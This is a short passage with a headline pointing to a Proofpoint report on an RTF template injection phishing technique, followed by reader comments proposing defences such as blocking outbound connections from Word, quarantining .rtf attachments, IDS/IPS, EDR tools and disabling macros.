December 1, 2021 Proofpoint: Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
And what about if you simply block MS Word or any other document reader from making outbound connections, will this attack still work?
How about blocking .rtf attachments alltogether unless there is a valid business reason and users could request the attachment to be released from quarantine and IT admins could analyze the file before releasing. I am wondering how EOP fairs with these method of attack. Alternatively there are other mitigating factors / tools: 1. Tools like Second Change (from Know4before) can stop users from going to dodgy links as a warning pops up showing the actual link where the user will be taken and asking them if they want to continue. 2. IDS / IPS software running on your network might catch that type of traffic and stop it 3. a good EDR tool can also prevent such attacks from executing 4. disabling macros and active content from Word